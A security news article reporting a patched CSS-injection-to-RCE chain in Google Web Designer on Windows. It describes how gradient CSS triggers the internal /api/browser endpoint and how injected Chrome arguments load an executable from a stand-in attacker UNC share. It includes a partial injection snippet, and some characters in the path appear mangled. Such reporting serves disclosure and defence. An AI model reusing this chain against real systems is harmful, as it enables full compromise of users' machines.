A critical client-side remote code execution (RCE) vulnerability in Google Web Designer exposed Windows users to full system compromise, according to a detailed write-up by security researcher Balint Magyar.
Affecting versions prior to 16.4.0.0711 (released July 29, 2025), the flaw allowed attackers to inject malicious CSS into a configuration file and leverage an internal API to execute arbitrary commands via Google Chrome’s command-line arguments.
At its core, the vulnerability stems from improper sanitization of custom gradient definitions in the gwd_workspace.json configuration file included with ad documents.
While solid colors are strictly parsed into their RGBA components, gradient entries are only checked for gradient-related keywords before being injected verbatim into the app’s UI.
By crafting a malicious CSS rule—specifically a background:url() function pointing to Google Web Designer’s internal REST API (ninja-shell)—an attacker can trigger unintended API calls when the user opens the Swatches color picker.
Once the CSS injection calls the /api/browser endpoint, which Google Web Designer uses to launch external browser processes, an attacker can break out of the URL parameter with a double quote to pass additional Chrome arguments.
"css": "-webkit-linear-gradient;/* INJECTION */"By abusing Chrome’s –browser-subprocess-path option, it becomes possible to point the browser to a remote executable hosted on a WebDAV share using a Universal Naming Convention (UNC) path (e.g., \attacker.comsharepayload.exe).
Chrome will silently download and execute the payload, granting the attacker full control of the victim’s system.
The attack sequence unfolds in four stages:
- Malicious Package Distribution: Victims download a crafted ad document package (e.g., through malvertising) and open it in Google Web Designer.
- CSS Injection: The gwd_workspace.json file defines a custom gradient swatch whose CSS payload references the /api/browser endpoint with injected Chrome arguments.
- API Invocation: When the user clicks the Swatches control, the app’s UI renders the malicious CSS, issuing an HTTP request to the internal API.
- Remote Code Execution: Google Web Designer spawns Chrome with the injected arguments, causing it to fetch and execute the attacker’s payload from the UNC share.
Balint Magyar’s discovery follows two earlier client-side RCE bugs (CVE-2025-1079 and CVE-2025-4613) in the same application, though those required symlink and path-traversal techniques.
This latest chain, awarded a $3,500 bounty by Google’s Vulnerability Reward Program, is praised for its elegance and rare escalation from CSS injection to full code execution—an attack vector scarcely documented in security research.
Google Web Designer, a free cross-platform tool for creating dynamic HTML5 ads, leverages the Chromium Embedded Framework for its interface.
While macOS and Linux versions remain safe due to stricter subprocess handling, Windows users faced the brunt of this exploit. Users are urged to update to version 16.4.0.0711 or later to mitigate the risk.
This vulnerability underscores the challenges of securing hybrid applications that blend native APIs and web technologies.
As complexity grows, so does the surface for novel attack chains. Security professionals and developers alike should take note: thorough sanitization and careful handling of user-provided data are paramount, especially when bridging web UIs with system-level APIs.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link
